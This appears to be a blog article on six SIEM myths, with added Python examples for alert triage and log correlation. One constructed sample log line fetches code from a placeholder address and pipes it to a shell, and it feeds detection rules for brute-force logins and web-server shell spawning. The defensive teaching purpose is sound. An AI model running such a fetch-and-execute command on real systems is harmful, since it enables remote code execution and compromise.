6 SIEM Myths to Avoid to Strengthen Your Organization’s Cybersecurity

SIEM is widely accepted as a cybersecurity staple, but incorrect notions around its implementation could be holding you back from extracting maximum value. We debunk six commonly believed misconceptions around security information and event management.

March 8, 2021

Security information and event management or SIEM is an essential part of any company’s security posture. It collects logs and telemetry from across your infrastructure, correlates them, checks for anomalies, and flags any warning sign that could indicate either a security risk (i.e., a vulnerability that could be exploited in the future) or a security breach (i.e., a deliberate or inadvertent compromise that has already happened). Typically, SIEM systems leverage automation to act on these red flags with minimal human intervention. Some also apply artificial intelligence (AI) to correlate system data more effectively and produce more accurate detections.

In 2021, in spite of being a relatively mature market, SIEM continues to grow at a rapid pace and is projected to reach $3.94 billion by 2024. There are plenty of options to choose from (on-premises, SaaS, and private cloud), and Infosec leaders must carefully govern their implementations to extract maximum value. Particularly in the wake of COVID-19 and the associated spike in attacks, you need to ensure your SIEM strategy is carefully calibrated to the pragmatic, on-the-ground reality of today’s complex threat landscape.

Let us look at six commonly repeated SIEM myths, unraveling why they no longer apply and how you could address them.

Learn More: Your 6-Point Guide for Evaluating Next-Gen SIEM Tools  

1. MYTH – Small businesses do not require SIEM

FACT – Every business with a networked digital infrastructure needs SIEM

Small businesses often believe that:

    1. They aren’t a big enough target to attract attackers’ attention
    2. Incoming threats are simple and few in number, so a small Infosec team can handle them manually
    3. They can keep their small workforce on a tight leash and so control their attack surface

In reality, this attitude makes small and mid-sized businesses a soft target for cybercriminals. Further, an SMB is far less able than a large enterprise to absorb the cost of a breach, whether that cost takes the form of penalties, ransom, or downtime. The U.S. National Cyber Security Alliance reports that only 14% of small businesses believe their ability to mitigate cyber risk and vulnerabilities is effective, despite admitting that a single data breach could cost them $10,000.

SMBs must reinforce their security infrastructure in 2021, and a big part of it is investing in SIEM. The good news is SaaS SIEM solutions and low-cost managed service offerings have reduced the barriers to entry significantly.

Learn More: 3 Steps for CISOs to Get More Out of SIEM Tool  

2. MYTH – SIEM costs more than the value it provides

FACT – SIEM offers impressive ROI and must be deployed correctly

In the early days, SIEM implementations involved high CAPEX and even higher OPEX: you needed to build a bespoke solution, integrate it with every node of your digital infrastructure, update it at regular intervals to keep pace with business growth, appoint a large team to act on alerts, and buy hardware to host the entire system. Fortunately, the days of legacy, expensive SIEM are over (even if the myth remains), and organizations now have competitive SIEM offerings at every price bracket, promising measurable ROI.

For example, Forrester’s Total Economic Impact studies put the ROI of IBM’s QRadar SIEM at 35%, while Azure Sentinel brings in a 201% ROI over three years. Both studies were commissioned by the respective vendor, so treat the figures as an upper bound and build your own business case on your own log volumes, alert rates, and staffing.

The key is setting the right value-generating timelines (mid to long term), opting for SaaS/cloud solutions, and augmenting security training to address the risk of human errors that could offset your SIEM benefits.

3. MYTH – SIEM is a set-and-forget solution

FACT – SIEM improves but does not replace human efforts

SIEM systems typically contain a high degree of automation. A rules-based correlation engine can handle alerts that match known patterns, while anomaly detection surfaces the unusual events that need a human judgment. But this doesn’t mean you no longer need a human in the loop. A 2020 industry survey revealed that just 5% of security leaders expect a reduction in staffing due to SIEM. Many intend to increase human effort as SIEM lowers their overall security costs and frees up resources to focus on more specialized tasks.

When implementing SIEM, organizations must upskill their Infosec team to:

    1. Configure and update alert-handling rules and baselines regularly
    2. Investigate alerts to the root cause and remediate, using threat intelligence and forensic tooling
    3. Provide security awareness training to the workforce

If in-house resources are scarce, a managed services provider can monitor SIEM operations and tune configurations remotely as needed.

4. MYTH – SIEM complexities are overwhelming

FACT – Modern SIEM tools have a gentle learning curve and come with stellar support

It’s true that the complexity of any system increases as it evolves. Just as a basic modern-day car is far more complex than a Ford Model T, the same applies to SIEM. However, the underlying functionality is effectively black-boxed, and users (i.e., your Infosec team) need only navigate user-facing interfaces, dashboards, and GUI configuration. The effort that remains is onboarding and normalizing your log sources and tuning detection rules, which is configuration work you can plan and budget for rather than a reason to hold off.

Today, SIEM comes with a short learning curve: you can start using solutions almost out of the box thanks to native integrations and business dashboards. Vendors also support customers at every step, with solution packaging of the customer’s choice (custom, turnkey, tailored, remote cloud-based, etc.), and offer user training.

For example, Microsoft has a series of video tutorials for Azure Sentinel customers. Peer insights and reviews on Gartner also debunk this myth, as customers say SIEM is “fairly easy to start using”, “immediately reliable”, “clearly demonstrating value and ease of use”, “finding possible incidents from day one”, and “available straight out of the box”, to name a few.

5. MYTH – All SIEM alerts call for the same degree of investigation

FACT – Alert baselines must be tuned regularly to keep false positives under control

One of the major points of hesitation regarding SIEM adoption is that it can cause alert fatigue. Indeed, according to a recent survey, 70% of companies have seen their alert volumes at least double in the past five years, while 83% face alert fatigue. That’s why it is so important to let go of the “all alerts need equal investigation” mindset and start prioritizing your backlog. Otherwise, there is a risk that critical alerts will slip through in a wave of false positives and the Infosec team will be unable to detect threats in real time.

AI-powered, cloud-based SIEM helps with this challenge because:

    1. The vendor continuously collects threat intelligence from its global solution instances and keeps updating your alert baselines remotely.
    2. Machine learning can correlate large volumes of system, device, and user information to filter out most of the false positives and focus attention on the alerts that matter.

It is useful to prioritize the alert backlog into buckets: alerts that need immediate remediation, alerts that are resolved through automation, and alerts that require future analysis. Anything that keeps landing in the last bucket, or keeps being suppressed, is a signal that the rule behind it needs its baseline adjusted.
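The bucketing described above, as an added example that is not part of the original article or any vendor’s product: a small Python triage step that applies tuned-out suppressions, collapses duplicates, scores what remains by severity, confidence and asset criticality, routes alerts into the three buckets, and then reports which rules are generating mostly low-value alerts (candidates for baseline tuning). The rule names, hosts, thresholds and the sample alerts are all constructed for illustration.

```python
"""Toy alert triage for a SIEM backlog.

Suppress noise the team has already tuned out, drop duplicates, score the rest
and route it into the three buckets from the text: immediate / automated / later.
All rule names, hosts, playbooks and sample alerts below are constructed."""
from collections import Counter

# Tuning baseline: (rule, source) pairs the team has confirmed benign.
SUPPRESSIONS = {("port_scan", "10.0.0.5")}          # authorised vulnerability scanner
# Rules with a tested response playbook that may run unattended.
AUTOMATABLE = {"known_malware_hash": "quarantine_file",
               "phishing_url_click": "block_url_and_reset_password"}
ASSET_CRITICALITY = {"dc01": 1.0, "web01": 0.8, "laptop-42": 0.4}   # 0..1, unknown hosts get 0.5
SEVERITY = {"critical": 1.0, "high": 0.75, "medium": 0.5, "low": 0.25}

# Constructed sample alerts (not from any real SIEM).
ALERTS = [
    {"id": 1, "rule": "port_scan", "src": "10.0.0.5", "host": "web01", "severity": "medium", "confidence": 0.9},
    {"id": 2, "rule": "port_scan", "src": "10.0.0.5", "host": "dc01", "severity": "medium", "confidence": 0.9},
    {"id": 3, "rule": "known_malware_hash", "src": "-", "host": "laptop-42", "severity": "high", "confidence": 0.95},
    {"id": 4, "rule": "credential_dump", "src": "-", "host": "dc01", "severity": "critical", "confidence": 0.8},
    {"id": 5, "rule": "credential_dump", "src": "-", "host": "dc01", "severity": "critical", "confidence": 0.8},  # repeat of 4
    {"id": 6, "rule": "rare_user_agent", "src": "203.0.113.9", "host": "web01", "severity": "low", "confidence": 0.3},
]

def score(alert):
    """Priority score in [0, 1]: how bad, how sure, and how much the asset matters."""
    return SEVERITY[alert["severity"]] * alert["confidence"] * ASSET_CRITICALITY.get(alert["host"], 0.5)

def triage(alerts, urgent_threshold=0.6):
    """Route alerts into buckets; returns a dict of bucket name -> alert ids."""
    buckets = {"immediate": [], "automated": [], "later": [], "suppressed": [], "duplicate": []}
    seen = set()
    for a in alerts:
        if (a["rule"], a["src"]) in SUPPRESSIONS:
            buckets["suppressed"].append(a["id"])
            continue
        key = (a["rule"], a["host"], a["src"])
        if key in seen:                      # same rule, host and source already in the queue
            buckets["duplicate"].append(a["id"])
            continue
        seen.add(key)
        if a["rule"] in AUTOMATABLE:         # hand to the playbook, record which one
            buckets["automated"].append((a["id"], AUTOMATABLE[a["rule"]]))
            continue
        target = "immediate" if score(a) >= urgent_threshold else "later"
        buckets[target].append(a["id"])
    return buckets

def tuning_candidates(alerts, buckets, min_count=2):
    """Rules whose alerts mostly end up suppressed, duplicated or deferred are
    the ones whose baseline should be revisited."""
    low_value = set(buckets["suppressed"]) | set(buckets["duplicate"]) | set(buckets["later"])
    counts = Counter(a["rule"] for a in alerts if a["id"] in low_value)
    return [rule for rule, n in counts.items() if n >= min_count]

if __name__ == "__main__":
    result = triage(ALERTS)
    for bucket, ids in result.items():
        print(f"{bucket:10s} {ids}")
    print("tune these rules:", tuning_candidates(ALERTS, result))
```

The score is deliberately simple; what matters is that the three inputs (severity, confidence, asset criticality) are all explicit and tunable, and that the suppression and duplicate logic runs before scoring so tuned-out noise never competes with real alerts for analyst time.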

Learn More: Top Vendors Pushing the Boundaries of SIEM 

6. MYTH – SIEM cannot protect against zero-day attacks

FACT – SIEM detects the activity an exploit produces, provided the implementation follows best practices

It is a common misconception that because SIEM cannot recognize a new or publicly unknown (zero-day) exploit by signature, it isn’t worth investing in.

In reality, SIEM is a detection control, not a preventive one, and it flags anomalous device and user behavior in all attack scenarios, including those driven by completely unknown exploits. What follows exploitation (a server process spawning a shell, a login from an unfamiliar source after a burst of failures, outbound traffic to a new destination) looks much the same whatever the initial vulnerability was. The exploit itself can slip under the radar, as can known vulnerabilities left open by botched upgrades or delayed patches (those are not zero-days, but they are what gets exploited most often), but SIEM can surface the system activity that results and alert your team. Studies suggest over a quarter of companies use SIEM to combat zero-day attacks.

It is advisable to follow a few best practices to ensure your SIEM is zero-day ready. First, SIEM should collect raw logs and normalize them, in real time, into a common schema that correlation rules can act on. Second, centralizing log data lets you triage and form accurate correlations across sources. Finally, a use-case database will help analysts get to the root cause of unusual alerts and determine whether there is a zero-day threat. Real-time data processing at scale, centralization, and use-case repositories are the features you need in a SIEM.
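The normalize-centralize-correlate pipeline described above, as an added example that is not part of the original article or any vendor’s product: a small Python pipeline that parses two constructed log streams (an sshd stream from a bastion host and a process-execution log from a web server) into one event schema, then runs two correlation rules over the merged stream. Neither rule carries a signature for a specific vulnerability; both key on post-exploitation behavior, which is what makes them useful against exploits nobody has seen yet. The log formats, hostnames, thresholds and rule names are all assumptions for illustration.

```python
"""Toy SIEM pipeline: normalise raw log lines into one schema, then run
correlation rules over the centralised stream.  Both rules key on behaviour
an intrusion leaves behind rather than on a signature for any one exploit.
Log formats, hosts and sample lines below are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample logs (not from any real system).
RAW_LOGS = [
    "2021-03-08T10:00:01Z bastion sshd: Failed password for admin from 203.0.113.7",
    "2021-03-08T10:00:03Z bastion sshd: Failed password for admin from 203.0.113.7",
    "2021-03-08T10:00:05Z bastion sshd: Failed password for admin from 203.0.113.7",
    "2021-03-08T10:00:06Z bastion sshd: Failed password for root from 198.51.100.9",
    "2021-03-08T10:00:09Z bastion sshd: Accepted password for admin from 203.0.113.7",
    "2021-03-08T10:02:00Z web01 exec: user=www-data parent=nginx cmd=/bin/sh -c 'curl http://203.0.113.7/x|sh'",
    "2021-03-08T10:02:30Z web01 exec: user=www-data parent=nginx cmd=/usr/sbin/php-fpm",
    "this line is in a format the parsers do not know",
]

SSH_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) sshd: (?P<result>Failed|Accepted) "
                    r"password for (?P<user>\S+) from (?P<src>\S+)$")
EXEC_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) exec: user=(?P<user>\S+) "
                     r"parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def normalise(line):
    """Map a raw line onto the common event schema; None for lines no parser knows."""
    m = SSH_RE.match(line)
    if m:
        d = m.groupdict()
        return {"ts": parse_ts(d["ts"]), "host": d["host"], "type": "auth",
                "outcome": "success" if d["result"] == "Accepted" else "failure",
                "user": d["user"], "src": d["src"]}
    m = EXEC_RE.match(line)
    if m:
        d = m.groupdict()
        return {"ts": parse_ts(d["ts"]), "host": d["host"], "type": "process",
                "user": d["user"], "parent": d["parent"], "cmd": d["cmd"]}
    return None  # unparsed lines must be counted and surfaced, never silently dropped

def rule_bruteforce_then_success(events, threshold=3, window=timedelta(minutes=5)):
    """Correlation across events: at least `threshold` failed logins from one source,
    then a success from that same source within `window`."""
    failures = defaultdict(list)
    alerts = []
    auth = sorted((e for e in events if e["type"] == "auth"), key=lambda e: e["ts"])
    for ev in auth:
        key = (ev["host"], ev["src"])
        if ev["outcome"] == "failure":
            failures[key].append(ev["ts"])
            continue
        recent = [t for t in failures[key] if ev["ts"] - t <= window]
        if len(recent) >= threshold:
            alerts.append({"rule": "bruteforce_then_success", "host": ev["host"],
                           "src": ev["src"], "user": ev["user"], "failures": len(recent)})
        failures[key] = []  # a success resets the counter for that source
    return alerts

SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash"}
WEB_PARENTS = {"nginx", "apache2", "httpd"}

def rule_webserver_spawns_shell(events):
    """Behavioural rule: a web server worker spawning a shell is the usual
    post-exploitation step of web RCE, whatever vulnerability got the attacker there."""
    return [{"rule": "webserver_spawns_shell", "host": e["host"], "parent": e["parent"], "cmd": e["cmd"]}
            for e in events
            if e["type"] == "process" and e["parent"] in WEB_PARENTS
            and (e["cmd"].split() or [""])[0] in SHELLS]

def run_pipeline(lines):
    """Centralise -> normalise -> correlate. Returns (alerts, count of unparsed lines)."""
    events, unparsed = [], 0
    for line in lines:
        ev = normalise(line)
        if ev is None:
            unparsed += 1
        else:
            events.append(ev)
    return rule_bruteforce_then_success(events) + rule_webserver_spawns_shell(events), unparsed

if __name__ == "__main__":
    alerts, unparsed = run_pipeline(RAW_LOGS)
    for a in alerts:
        print(a)
    print(f"{unparsed} line(s) matched no parser")
```

Two points a practitioner should take from this: the brute-force rule only works because both streams share a schema and a clock, which is the centralization and normalization argument made above; and the unparsed-line count is a health metric worth alerting on, because a log source whose format changed after an upgrade goes dark in exactly the way that lets an intrusion through.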

As you can see, the conversation around security information and event management or SIEM is incredibly nuanced, fraught with misconceptions and myths as much as there is immense potential. Infosec leaders must review the SIEM options available to them based on the hosting environment, remote and on-site support, global threat intelligence, correlation techniques, and ease of use to extract maximum value from their investment.

Ultimately, SIEM solutions return outsized and incremental value over time, and given today’s threat landscape and range of options, they are a no-brainer for organizations of every size.

What are your top concerns around investing in SIEM in 2021? Comment below or let us know on LinkedIn, Twitter, or Facebook. We would love to hear from you!

Locutus

Computer engineer

As someone who has been assimilated into the computer age when punch cards and marking Xs were all the rage, I have now become completely assimilated with my electron gobbling companions. My first computer was a Dick Smith System 80 blue label with its excellent basic programming manual. I had always been fascinated with graphics and I wrote my first drawing program (using a joystick as I had no mouse) on the venerable apple ][e. After discovering the x86 IBM clones and wangling my way into the computer industry I hopped several cities before meeting my other half and followed her from Australia to Turkey where I am immersed in my work as a Computer Engineer, System Administrator, OS builder (Linux from Scratch and Android) and general techno-head.
